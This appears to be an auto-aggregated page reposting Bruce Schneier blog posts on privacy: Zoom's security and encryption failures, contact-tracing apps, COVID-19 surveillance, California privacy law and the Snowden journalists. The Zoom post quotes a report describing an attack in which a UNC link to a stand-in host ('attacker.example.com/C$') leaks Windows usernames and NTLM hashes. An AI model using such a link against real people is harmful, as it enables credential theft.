SSL and internet security news

privacy

Auto Added by WPeMatico

New Research: “Privacy Threats in Intimate Relationships”

I just published a new paper with Karen Levy of Cornell: “Privacy Threats in Intimate Relationships.”

Abstract: This article provides an overview of intimate threats: a class of privacy threats that can arise within our families, romantic partnerships, close friendships, and caregiving relationships. Many common assumptions about privacy are upended in the context of these relationships, and many otherwise effective protective measures fail when applied to intimate threats. Those closest to us know the answers to our secret questions, have access to our devices, and can exercise coercive power over us. We survey a range of intimate relationships and describe their common features. Based on these features, we explore implications for both technical privacy design and policy, and offer design recommendations for ameliorating intimate privacy risks.

This is an important issue that has gotten much too little attention in the cybersecurity community.

Powered by WPeMatico

Zoom’s Commitment to User Security Depends on Whether you Pay It or Not

Zoom was doing so well…. And now we have this:

Corporate clients will get access to Zoom’s end-to-end encryption service now being developed, but Yuan said free users won’t enjoy that level of privacy, which makes it impossible for third parties to decipher communications.

“Free users for sure we don’t want to give that because we also want to work together with FBI, with local law enforcement in case some people use Zoom for a bad purpose,” Yuan said on the call.

This is just dumb. Imagine the scene in the terrorist/drug kingpin/money launderer hideout: “I’m sorry, boss. We could have have strong encryption to secure our bad intentions from the FBI, but we can’t afford the $20.” This decision will only affect protesters and dissidents and human rights workers and journalists.

Here’s advisor Alex Stamos doing damage control:

Nico, it’s incorrect to say that free calls won’t be encrypted and this turns out to be a really difficult balancing act between different kinds of harms. More details here:

Some facts on Zoom’s current plans for E2E encryption, which are complicated by the product requirements for an enterprise conferencing product and some legitimate safety issues. The E2E design is available here: https://github.com/zoom/zoom-e2e-whitepaper/blob/master/zoom_e2e.pdf

I read that document, and it doesn’t explain why end-to-end encryption is only available to paying customers. And note that Stamos said “encrypted” and not “end-to-end encrypted.” He knows the difference.

Anyway, people were rightly incensed by his remarks. And yesterday, Yuan tried to clarify:

Yuan sought to assuage users’ concerns Wednesday in his weekly webinar, saying the company was striving to “do the right thing” for vulnerable groups, including children and hate-crime victims, whose abuse is sometimes broadcast through Zoom’s platform.

“We plan to provide end-to-end encryption to users for whom we can verify identity, thereby limiting harm to vulnerable groups,” he said. “I wanted to clarify that Zoom does not monitor meeting content. We do not have backdoors where participants, including Zoom employees or law enforcement, can enter meetings without being visible to others. None of this will change.”

Notice that is specifically did not say that he was offering end-to-end encryption to users of the free platform. Only to “users we can verify identity,” which I’m guessing means users that give him a credit card number.

The Twitter feed was similarly sloppily evasive:

We are seeing some misunderstandings on Twitter today around our encryption. We want to provide these facts.

Zoom does not provide information to law enforcement except in circumstances such as child sexual abuse.

Zoom does not proactively monitor meeting content.

Zoom does no have backdoors where Zoom or others can enter meetings without being visible to participants.

AES 256 GCM encryption is turned on for all Zoom users — free and paid.

Those facts have nothing to do with any “misunderstanding.” That was about end-to-end encryption, which the statement very specifically left out of that last sentence. The corporate communications have been clear and consistent.

Come on, Zoom. You were doing so well. Of course you should offer premium features to paying customers, but please don’t include security and privacy in those premium features. They should be available to everyone.

And, hey, this is kind of a dumb time to side with the police over protesters.

I have emailed the CEO, and will report back if I hear back. But for now, assume that the free version of Zoom will not support end-to-end encryption.

EDITED TO ADD (6/4): Another article.

EDITED TO ADD (6/4): I understand that this is complicated, both technically and politically. (Note, though, Jitsi does it.) And, yes, lots of people confused end-to-end encryption with link encryption. (My readers tend to be more sophisticated than that.) My worry that the “we’ll offer end-to-end encryption only to paying customers we can verify, even though there’s plenty of evidence that ‘bad purpose’ people will just get paid accounts” story plays into the dangerous narrative that encryption itself is dangerous when widely available. And disagree with the notion that the possibility child exploitation is a valid reason to deny security to large groups of people.

Powered by WPeMatico

Bart Gellman on Snowden

Bart Gellman’s long-awaited (at least by me) book on Edward Snowden, Dark Mirror: Edward Snowden and the American Surveillance State, will finally be published in a couple of weeks. There is an adapted excerpt in the Atlantic.

It’s an interesting read, mostly about the government surveillance of him and other journalists. He speaks about an NSA program called FIRSTFRUITS that specifically spies on US journalists. (This isn’t news; we learned about this in 2006. But there are lots of new details.)

One paragraph in the excerpt struck me:

Years later Richard Ledgett, who oversaw the NSA’s media-leaks task force and went on to become the agency’s deputy director, told me matter-of-factly to assume that my defenses had been breached. “My take is, whatever you guys had was pretty immediately in the hands of any foreign intelligence service that wanted it,” he said, “whether it was Russians, Chinese, French, the Israelis, the Brits. Between you, Poitras, and Greenwald, pretty sure you guys can’t stand up to a full-fledged nation-state attempt to exploit your IT. To include not just remote stuff, but hands-on, sneak-into-your-house-at-night kind of stuff. That’s my guess.”

I remember thinking the same thing. It was the summer of 2013, and I was visiting Glenn Greenwald in Rio de Janeiro. This was just after Greenwald’s partner was detained in the UK trying to ferry some documents from Laura Poitras in Berlin back to Greenwald. It was an opsec disaster; they would have been much more secure if they’d emailed the encrypted files. In fact, I told them to do that, every single day. I wanted them to send encrypted random junk back and forth constantly, to hide when they were actually sharing real data.

As soon as I saw their house I realized exactly what Ledgett said. I remember standing outside the house, looking into the dense forest for TEMPEST receivers. I didn’t see any, which only told me they were well hidden. I guessed that black-bag teams from various countries had already been all over the house when they were out for dinner, and wondered what would have happened if teams from different countries bumped into each other. I assumed that all the countries Ledgett listed above — plus the US and a few more — had a full take of what Snowden gave the journalists. These journalists against those governments just wasn’t a fair fight.

I’m looking forward to reading Gellman’s book. I’m kind of surprised no one sent me an advance copy.

Powered by WPeMatico

Another California Data Privacy Law

The California Consumer Privacy Act is a lesson in missed opportunities. It was passed in haste, to stop a ballot initiative that would have been even more restrictive:

In September 2017, Alastair Mactaggart and Mary Ross proposed a statewide ballot initiative entitled the “California Consumer Privacy Act.” Ballot initiatives are a process under California law in which private citizens can propose legislation directly to voters, and pursuant to which such legislation can be enacted through voter approval without any action by the state legislature or the governor. While the proposed privacy initiative was initially met with significant opposition, particularly from large technology companies, some of that opposition faded in the wake of the Cambridge Analytica scandal and Mark Zuckerberg’s April 2018 testimony before Congress. By May 2018, the initiative appeared to have garnered sufficient support to appear on the November 2018 ballot. On June 21, 2018, the sponsors of the ballot initiative and state legislators then struck a deal: in exchange for withdrawing the initiative, the state legislature would pass an agreed version of the California Consumer Privacy Act. The initiative was withdrawn, and the state legislature passed (and the Governor signed) the CCPA on June 28, 2018.

Since then, it was substantially amended — that is, watered down — at the request of various surveillance capitalism companies. Enforcement was supposed to start this year, but we haven’t seen much yet.

And we could have had that ballot initiative.

It looks like Alastair Mactaggart and others are back.

Advocacy group Californians for Consumer Privacy, which started the push for a state-wide data privacy law, announced this week that it has the signatures it needs to get version 2.0 of its privacy rules on the US state’s ballot in November, and submitted its proposal to Sacramento.

This time the goal is to tighten up the rules that its previously ballot measure managed to get into law, despite the determined efforts of internet giants like Google and Facebook to kill it. In return for the legislation being passed, that ballot measure was dropped. Now, it looks like the campaigners are taking their fight to a people’s vote after all.

[…]

The new proposal would add more rights, including the use and sale of sensitive personal information, such as health and financial information, racial or ethnic origin, and precise geolocation. It would also triples existing fines for companies caught breaking the rules surrounding data on children (under 16s) and would require an opt-in to even collect such data.

The proposal would also give Californians the right to know when their information is used to make fundamental decisions about them, such as getting credit or employment offers. And it would require political organizations to divulge when they use similar data for campaigns.

And just to push the tech giants from fury into full-blown meltdown the new ballot measure would require any amendments to the law to require a majority vote in the legislature, effectively stripping their vast lobbying powers and cutting off the multitude of different ways the measures and its enforcement can be watered down within the political process.

I don’t know why they accepted the compromise in the first place. It was obvious that the legislative process would be hijacked by the powerful tech companies. I support getting this onto the ballot this year.

Powered by WPeMatico

Me on COVID-19 Contact Tracing Apps

I was quoted in BuzzFeed:

“My problem with contact tracing apps is that they have absolutely no value,” Bruce Schneier, a privacy expert and fellow at the Berkman Klein Center for Internet & Society at Harvard University, told BuzzFeed News. “I’m not even talking about the privacy concerns, I mean the efficacy. Does anybody think this will do something useful? … This is just something governments want to do for the hell of it. To me, it’s just techies doing techie things because they don’t know what else to do.”

I haven’t blogged about this because I thought it was obvious. But from the tweets and emails I have received, it seems not.

This is a classic identification problem, and efficacy depends on two things: false positives and false negatives.

  • False positives: Any app will have a precise definition of a contact: let’s say it’s less than six feet for more than ten minutes. The false positive rate is the percentage of contacts that don’t result in transmissions. This will be because of several reasons. One, the app’s location and proximity systems — based on GPS and Bluetooth — just aren’t accurate enough to capture every contact. Two, the app won’t be aware of any extenuating circumstances, like walls or partitions. And three, not every contact results in transmission; the disease has some transmission rate that’s less than 100% (and I don’t know what that is).

  • False negatives: This is the rate the app fails to register a contact when an infection occurs. This also will be because of several reasons. One, errors in the app’s location and proximity systems. Two, transmissions that occur from people who don’t have the app (even Singapore didn’t get above a 20% adoption rate for the app). And three, not every transmission is a result of that precisely defined contact — the virus sometimes travels further.

Assume you take the app out grocery shopping with you and it subsequently alerts you of a contact. What should you do? It’s not accurate enough for you to quarantine yourself for two weeks. And without ubiquitous, cheap, fast, and accurate testing, you can’t confirm the app’s diagnosis. So the alert is useless.

Similarly, assume you take the app out grocery shopping and it doesn’t alert you of any contact. Are you in the clear? No, you’re not. You actually have no idea if you’ve been infected.

The end result is an app that doesn’t work. People will post their bad experiences on social media, and people will read those posts and realize that the app is not to be trusted. That loss of trust is even worse than having no app at all.

It has nothing to do with privacy concerns. The idea that contact tracing can be done with an app, and not human health professionals, is just plain dumb.

EDITED TO ADD: This Brookings essay makes much the same point.

Powered by WPeMatico

How Did Facebook Beat a Federal Wiretap Demand?

This is interesting:

Facebook Inc. in 2018 beat back federal prosecutors seeking to wiretap its encrypted Messenger app. Now the American Civil Liberties Union is seeking to find out how.

The entire proceeding was confidential, with only the result leaking to the press. Lawyers for the ACLU and the Washington Post on Tuesday asked a San Francisco-based federal court of appeals to unseal the judge’s decision, arguing the public has a right to know how the law is being applied, particularly in the area of privacy.

[…]

The Facebook case stems from a federal investigation of members of the violent MS-13 criminal gang. Prosecutors tried to hold Facebook in contempt after the company refused to help investigators wiretap its Messenger app, but the judge ruled against them. If the decision is unsealed, other tech companies will likely try to use its reasoning to ward off similar government requests in the future.

Here’s the 2018 story. Slashdot thread.

Powered by WPeMatico

Global Surveillance in the Wake of COVID-19

OneZero is tracking thirty countries around the world who are implementing surveillance programs in the wake of COVID-19:

The most common form of surveillance implemented to battle the pandemic is the use of smartphone location data, which can track population-level movement down to enforcing individual quarantines. Some governments are making apps that offer coronavirus health information, while also sharing location information with authorities for a period of time. For instance, in early March, the Iranian government released an app that it pitched as a self-diagnostic tool. While the tool’s efficacy was likely low, given reports of asymptomatic carriers of the virus, the app saved location data of millions of Iranians, according to a Vice report.

One of the most alarming measures being implemented is in Argentina, where those who are caught breaking quarantine are being forced to download an app that tracks their location. In Hong Kong, those arriving in the airport are given electronic tracking bracelets that must be synced to their home location through their smartphone’s GPS signal.

Powered by WPeMatico

California Needlessly Reduces Privacy During COVID-19 Pandemic

This one isn’t even related to contact tracing:

On March 17, 2020, the federal government relaxed a number of telehealth-related regulatory requirements due to COVID-19. On April 3, 2020, California Governor Gavin Newsom issued Executive Order N-43-20 (the Order), which relaxes various telehealth reporting requirements, penalties, and enforcements otherwise imposed under state laws, including those associated with unauthorized access and disclosure of personal information through telehealth mediums.

Lots of details at the link.

Powered by WPeMatico

Contact Tracing COVID-19 Infections via Smartphone Apps

Google and Apple have announced a joint project to create a privacy-preserving COVID-19 contact tracing app. (Details, such as we have them, are here.) It’s similar to the app being developed at MIT, and similar to others being described and developed elsewhere. It’s nice seeing the privacy protections; they’re well thought out.

I was going to write a long essay about the security and privacy concerns, but Ross Anderson beat me to it. (Note that some of his comments are UK-specific.)

First, it isn’t anonymous. Covid-19 is a notifiable disease so a doctor who diagnoses you must inform the public health authorities, and if they have the bandwidth they call you and ask who you’ve been in contact with. They then call your contacts in turn. It’s not about consent or anonymity, so much as being persuasive and having a good bedside manner.

I’m relaxed about doing all this under emergency public-health powers, since this will make it harder for intrusive systems to persist after the pandemic than if they have some privacy theater that can be used to argue that the whizzy new medi-panopticon is legal enough to be kept running.

Second, contact tracers have access to all sorts of other data such as public transport ticketing and credit-card records. This is how a contact tracer in Singapore is able to phone you and tell you that the taxi driver who took you yesterday from Orchard Road to Raffles has reported sick, so please put on a mask right now and go straight home. This must be controlled; Taiwan lets public-health staff access such material in emergencies only.

Third, you can’t wait for diagnoses. In the UK, you only get a test if you’re a VIP or if you get admitted to hospital. Even so the results take 1-3 days to come back. While the VIPs share their status on twitter or facebook, the other diagnosed patients are often too sick to operate their phones.

Fourth, the public health authorities need geographical data for purposes other than contact tracing – such as to tell the army where to build more field hospitals, and to plan shipments of scarce personal protective equipment. There are already apps that do symptom tracking but more would be better. So the UK app will ask for the first three characters of your postcode, which is about enough to locate which hospital you’d end up in.

Fifth, although the cryptographers – and now Google and Apple – are discussing more anonymous variants of the Singapore app, that’s not the problem. Anyone who’s worked on abuse will instantly realise that a voluntary app operated by anonymous actors is wide open to trolling. The performance art people will tie a phone to a dog and let it run around the park; the Russians will use the app to run service-denial attacks and spread panic; and little Johnny will self-report symptoms to get the whole school sent home.

I recommend reading his essay in full. Also worth reading are this EFF essay, and this ACLU white paper.

To me, the real problems aren’t around privacy and security. The efficacy of any app-based contact tracing is still unproven. A “contact” from the point of view of an app isn’t the same as an epidemiological contact. And the ratio of infections to contacts is high. We would have to deal with the false positives (being close to someone else, but separated by a partition or other barrier) and the false negatives (not being close to someone else, but contracting the disease through a mutually touched object). And without cheap, fast, and accurate testing, the information from any of these apps isn’t very useful. So I agree with Ross that this is primarily an exercise in that false syllogism: Something must be done. This is something. Therefore, we must do it. It’s techies proposing tech solutions to what is primarily a social problem.

EDITED TO ADD: Susan Landau on contact tracing apps and how they’re being oversold. And Farzad Mostashari, former coordinator for health IT at the Department of Health and Human Services, on contact tracing apps.

As long as 1) every contact does not result in an infection, and 2) a large percentage of people with the disease are asymptomatic and don’t realize they have it, I can’t see how this sort of app is valuable. If we had cheap, fast, and accurate testing for everyone on demand…maybe. But I still don’t think so.

Powered by WPeMatico

Security and Privacy Implications of Zoom

Over the past few weeks, Zoom’s use has exploded since it became the video conferencing platform of choice in today’s COVID-19 world. (My own university, Harvard, uses it for all of its classes. Boris Johnson had a cabinet meeting over Zoom.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.

In general, Zoom’s problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.

Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.

The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.

Last month, Zoom’s privacy policy contained this bit:

Does Zoom sell Personal Data? Depends what you mean by “sell.” We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace. So in our humble opinion, we don’t think most of our users would see us as selling their information, as that practice is commonly understood.

“Depends what you mean by ‘sell.'” “…most of our users would see us as selling…” “…as that practice is commonly understood.” That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who “download[ed] an app from the Marketplace” remember consenting to them giving your personal data to third parties? I don’t.

Doc Searls has been all over this, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.

On March 29th, Zoom rewrote its privacy policy:

We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.

[…]

We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.

There’s lots more. It’s better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages “marketing websites,” which means it’s still using third-party trackers and surveillance based advertising. (Honestly, Zoom, just stop doing it.)

Now security: Zoom’s security is at best sloppy, and malicious at worst. Motherboard reported that Zoom’s iPhone app was sending user data to Facebook, even if the user didn’t have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

“We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

This isn’t the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user’s web camera without the user’s knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.

On 4/1, we learned that Zoom for Windows can be used to steal users’ Window credentials.

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings — such as \attacker.example.com/C$ — into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

On 4/2, we learned that Zoom secretly displayed data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)

I’m sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.

But it gets worse. Zoom’s encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn’t. It only provides link encryption, which means everything is unencrypted on the company’s servers. From the Intercept:

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

They’re also lying about the type of encryption. On 4/3, Citizen Lab reported

Zoom documentation claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.

The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China.

I’m okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.

And that China connection is worrisome. Citizen Lab again:

Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom’s software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

Finally, bad user configuration. Zoom has a lot of options. The defaults aren’t great, and if you don’t configure your meetings right you’re leaving yourself open to all sort of mischief.

Zoombombing” is the most visible problem. People are finding open Zoom meetings, classes, and events: joining them, and sharing their screens to broadcast offensive content — porn, mostly — to everyone. It’s awful if you’re the victim, and a consequence of allowing any participant to share their screen.

Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. Turns out that Zoom didn’t make the meeting ID long enough to prevent someone from randomly trying them, looking for meetings. This isn’t new; Checkpoint Research reported this last summer. Instead of making the meeting IDs longer or more complicated — which it should have done — it enabled meeting passwords by default. Of course most of us don’t use passwords, and there are now automatic tools for finding Zoom meetings.

For help securing your Zoom sessions, Zoom has a good guide. Short summary: don’t share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.

That’s what we know about Zoom’s privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.

Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it’s in the spotlight, it’s all coming out. (Their 4/1 response to all of this is here.) On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let’s see if that’s anything more than a PR move.

In the meantime, you should either lock Zoom down as best you can, or — better yet — abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.

EDITED TO ADD: Fight for the Future is on this.

Steve Bellovin’s comments.

Meanwhile, lots of Zoom video recordings are available on the Internet. The article doesn’t have any useful details about how they got there:

Videos viewed by The Post included one-on-one therapy sessions; a training orientation for workers doing telehealth calls, which included people’s names and phone numbers; small-business meetings, which included private company financial statements; and elementary-school classes, in which children’s faces, voices and personal details were exposed.

Many of the videos include personally identifiable information and deeply intimate conversations, recorded in people’s homes. Other videos include nudity, such as one in which an aesthetician teaches students how to give a Brazilian wax.

[…]

Many of the videos can be found on unprotected chunks of Amazon storage space, known as buckets, which are widely used across the Web. Amazon buckets are locked down by default, but many users make the storage space publicly accessible either inadvertently or to share files with other people.

Powered by WPeMatico